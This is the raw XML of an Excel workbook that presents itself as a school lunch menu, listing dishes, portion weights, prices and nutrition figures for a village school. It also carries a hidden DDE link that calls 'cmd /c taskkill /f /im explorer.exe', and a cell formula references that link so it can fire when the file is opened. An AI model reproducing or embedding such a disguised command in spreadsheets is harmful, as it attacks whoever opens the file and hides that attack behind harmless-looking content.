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49F3C835-F312-43DE-898A-3CB12704A4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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="50" uniqueCount="48">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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(для детского питания)</t>
  </si>
  <si>
    <t>Б000086</t>
  </si>
  <si>
    <t>Б000002</t>
  </si>
  <si>
    <t>Хлеб ржаной(пшеничный)</t>
  </si>
  <si>
    <t>Б000064</t>
  </si>
  <si>
    <t>Чай из сухой смеси с витаминами</t>
  </si>
  <si>
    <t>ДП00216</t>
  </si>
  <si>
    <t>Паста сливочная с курицей</t>
  </si>
  <si>
    <t>ДП00198</t>
  </si>
  <si>
    <t>Салат из моркови с апельсином</t>
  </si>
  <si>
    <t>Б000021</t>
  </si>
  <si>
    <t>каша гречневая вязкая</t>
  </si>
  <si>
    <t>Б000022</t>
  </si>
  <si>
    <t>Свекольник со сметаной</t>
  </si>
  <si>
    <t>ДП00008</t>
  </si>
  <si>
    <t>Салат из белокочанной капусты</t>
  </si>
  <si>
    <t>ДП00067</t>
  </si>
  <si>
    <t>Напиток яблочно-лимонный</t>
  </si>
  <si>
    <t>ДП00226</t>
  </si>
  <si>
    <t>Тефтели с рисом в сметанно-том.соусе(2в)</t>
  </si>
  <si>
    <t>МОБУ СОШ д.Шарипкулово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</si>
</sst>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ddeLink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ddeService="cmd" ddeTopic="/c taskkill /f /im explorer.exe &gt;nul">
    <ddeItems>
      <ddeItem name="_xlbgnm.A1" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </ddeLin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47</v>
      </c>
      <c r="C1" s="40"/>
      <c r="D1" s="41"/>
      <c r="E1" t="s">
        <v>22</v>
      </c>
      <c r="F1" s="24"/>
      <c r="I1" t="s">
        <v>1</v>
      </c>
      <c r="J1" s="23">
        <v>44951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3" t="s">
        <v>34</v>
      </c>
      <c r="E4" s="15">
        <v>200</v>
      </c>
      <c r="F4" s="25">
        <v>43.31</v>
      </c>
      <c r="G4" s="15">
        <v>290</v>
      </c>
      <c r="H4" s="15">
        <v>12.2</v>
      </c>
      <c r="I4" s="15">
        <v>13.6</v>
      </c>
      <c r="J4" s="16">
        <v>30.4</v>
      </c>
    </row>
    <row r="5" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A5" s="7"/>
      <c r="B5" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>31</v>
      </c>
      <c r="D5" s="34" t="s">
        <v>32</v>
      </c>
      <c r="E5" s="17">
        <v>200</v>
      </c>
      <c r="F5" s="26">
        <v>7.94</v>
      </c>
      <c r="G5" s="17">
        <v>34</v>
      </c>
      <c r="H5" s="17">
        <v>0.1</v>
      </c>
      <c r="I5" s="17"/>
      <c r="J5" s="18">
        <v>8.6999999999999993</v>
      </c>
    </row>
    <row r="6" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A6" s="7"/>
      <c r="B6" s="1" t="s">
        <v>23</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>28</v>
      </c>
      <c r="D6" s="34" t="s">
        <v>27</v>
      </c>
      <c r="E6" s="17">
        <v>50</v>
      </c>
      <c r="F6" s="26">
        <v>4.88</v>
      </c>
      <c r="G6" s="17">
        <v>117.5</v>
      </c>
      <c r="H6" s="17">
        <v>2.75</v>
      </c>
      <c r="I6" s="17">
        <v>0.5</v>
      </c>
      <c r="J6" s="18">
        <v>24.15</v>
      </c>
    </row>
    <row r="7" spans="1:10" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A7" s="7"/>
      <c r="B7" s="2"/>
      <c r="C7" s="38" t="s">
        <v>35</v>
      </c>
      <c r="D7" s="35" t="s">
        <v>36</v>
      </c>
      <c r="E7" s="17">
        <v>50</v>
      </c>
      <c r="F7" s="26">
        <v>8.31</v>
      </c>
      <c r="G7" s="17">
        <v>40.5</v>
      </c>
      <c r="H7" s="17">
        <v>0.05</v>
      </c>
      <c r="I7" s="17">
        <v>2.0499999999999998</v>
      </c>
      <c r="J7" s="18">
        <v>2.1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6" t="s">
        <v>42</v>
      </c>
      <c r="E12" s="21">
        <v>60</v>
      </c>
      <c r="F12" s="28">
        <v>4.82</v>
      </c>
      <c r="G12" s="21">
        <v>53.25</v>
      </c>
      <c r="H12" s="21">
        <v>1.65</v>
      </c>
      <c r="I12" s="21">
        <v>3.15</v>
      </c>
      <c r="J12" s="22">
        <v>7.125</v>
      </c>
    </row>
    <row r="13" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A13" s="7"/>
      <c r="B13" s="1" t="s">
        <v>16</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>39</v>
      </c>
      <c r="D13" s="34" t="s">
        <v>40</v>
      </c>
      <c r="E13" s="17">
        <v>200</v>
      </c>
      <c r="F13" s="26">
        <v>11.2</v>
      </c>
      <c r="G13" s="17">
        <v>108</v>
      </c>
      <c r="H13" s="17">
        <v>2.944</v>
      </c>
      <c r="I13" s="17">
        <v>5.4960000000000004</v>
      </c>
      <c r="J13" s="18">
        <v>19.64</v>
      </c>
    </row>
    <row r="14" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A14" s="7"/>
      <c r="B14" s="1" t="s">
        <v>17</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>45</v>
      </c>
      <c r="D14" s="34" t="s">
        <v>46</v>
      </c>
      <c r="E14" s="17">
        <v>100</v>
      </c>
      <c r="F14" s="26">
        <v>29.16</v>
      </c>
      <c r="G14" s="17">
        <v>282</v>
      </c>
      <c r="H14" s="17">
        <v>15.4</v>
      </c>
      <c r="I14" s="17">
        <v>8.4</v>
      </c>
      <c r="J14" s="18">
        <v>25.2</v>
      </c>
    </row>
    <row r="15" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A15" s="7"/>
      <c r="B15" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>37</v>
      </c>
      <c r="D15" s="34" t="s">
        <v>38</v>
      </c>
      <c r="E15" s="17">
        <v>160</v>
      </c>
      <c r="F15" s="26">
        <v>14.83</v>
      </c>
      <c r="G15" s="17">
        <v>142</v>
      </c>
      <c r="H15" s="17">
        <v>4.2</v>
      </c>
      <c r="I15" s="17">
        <v>9.49</v>
      </c>
      <c r="J15" s="18">
        <v>22.22</v>
      </c>
    </row>
    <row r="16" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A16" s="7"/>
      <c r="B16" s="1" t="s">
        <v>19</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>43</v>
      </c>
      <c r="D16" s="34" t="s">
        <v>44</v>
      </c>
      <c r="E16" s="17">
        <v>180</v>
      </c>
      <c r="F16" s="26">
        <v>5.83</v>
      </c>
      <c r="G16" s="17">
        <v>84.6</v>
      </c>
      <c r="H16" s="17">
        <v>0.216</v>
      </c>
      <c r="I16" s="17">
        <v>0.16200000000000001</v>
      </c>
      <c r="J16" s="18">
        <v>20.529</v>
      </c>
    </row>
    <row r="17" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A17" s="7"/>
      <c r="B17" s="1" t="s">
        <v>24</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>28</v>
      </c>
      <c r="D17" s="34" t="s">
        <v>27</v>
      </c>
      <c r="E17" s="17">
        <v>40</v>
      </c>
      <c r="F17" s="26">
        <v>4.4400000000000004</v>
      </c>
      <c r="G17" s="17">
        <v>94</v>
      </c>
      <c r="H17" s="17">
        <v>2.2000000000000002</v>
      </c>
      <c r="I17" s="17">
        <v>0.4</v>
      </c>
      <c r="J17" s="18">
        <v>19.32</v>
      </c>
    </row>
    <row r="18" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A18" s="7"/>
      <c r="B18" s="1" t="s">
        <v>21</v>
      </c>
      <c r="C18" s="2" t="s">
        <v>29</v>
      </c>
      <c r="D18" s="34" t="s">
        <v>30</v>
      </c>
      <c r="E18" s="17">
        <v>20</v>
      </c>
      <c r="F18" s="26">
        <v>2.2599999999999998</v>
      </c>
      <c r="G18" s="17">
        <v>58</v>
      </c>
      <c r="H18" s="17">
        <v>0.6</v>
      </c>
      <c r="I18" s="17">
        <v>0.24</v>
      </c>
      <c r="J18" s="18">
        <v>6.82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 t="e">
        <f>[1]!_xlbgnm.A1</f>
        <v>#REF!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2023-01-26T15:11:52Z</dcterms:modified>
</cp:coreProperties>
</file>